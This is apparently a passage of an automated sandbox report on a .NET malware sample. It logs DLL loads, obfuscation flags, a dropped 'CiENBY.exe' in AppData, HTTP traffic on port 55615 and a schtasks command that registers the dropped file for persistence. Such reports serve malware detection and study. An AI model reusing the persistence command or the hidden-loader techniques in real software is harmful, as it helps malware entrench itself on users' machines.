                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: PZNfhfaj9O.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PZNfhfaj9O.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PZNfhfaj9O.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: ACRONG~1.TXTntkrnlmp.pdbxx, source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: DQOrL.pdbSHA256 source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: Binary string: DQOrL.pdb source: PZNfhfaj9O.exe, CiENBY.exe.0.dr

                    Data Obfuscation

                    Source: PZNfhfaj9O.exe, frmInicioSesion.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: PZNfhfaj9O.exe, frmInicioSesion.cs .Net Code: InitializeComponent contains xor as well as GetObject
                    Source: CiENBY.exe.0.dr, frmInicioSesion.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: CiENBY.exe.0.dr, frmInicioSesion.cs .Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.cs .Net Code: jfKRJHN6kuoL3ElIVaq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.cs .Net Code: jfKRJHN6kuoL3ElIVaq System.Reflection.Assembly.Load(byte[])
                    Source: PZNfhfaj9O.exe Static PE information: 0xDCB7B960 [Tue May 6 02:54:24 2087 UTC]
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_02CD47B9 push ebp; iretd 0_2_02CD481D
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_02CDEF30 push eax; iretd 0_2_02CDEF31
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_0766B614 pushad ; ret 0_2_0766B61E
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_0766E5E8 push eax; ret 0_2_0766E5E9
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_076683F5 push ecx; ret 0_2_076683F6
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07669387 push esp; ret 0_2_07669396
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07669398 push edx; ret 0_2_07669646
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07667E7A push eax; ret 0_2_07667E7C
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07667E9C push ecx; ret 0_2_07667E9D
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07663CFB push ecx; ret 0_2_07663D0A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07663C8B push eax; ret 0_2_07663C9A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 0_2_07669A33 pushad ; ret 0_2_07669A52
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Code function: 9_2_067DE5DF push es; ret 9_2_067DE5E0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Code function: 11_2_02C847B9 push ebp; retf 11_2_02C8481D
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Code function: 11_2_02C8EF30 push eax; iretd 11_2_02C8EF31
                    Source: PZNfhfaj9O.exe Static PE information: section name: .text entropy: 7.85886818157661
                    Source: CiENBY.exe.0.dr Static PE information: section name: .text entropy: 7.85886818157661
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe File created: C:\Users\user\AppData\Roaming\CiENBY.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (29).png
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknown; Network traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknown; Network traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknown; Network traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
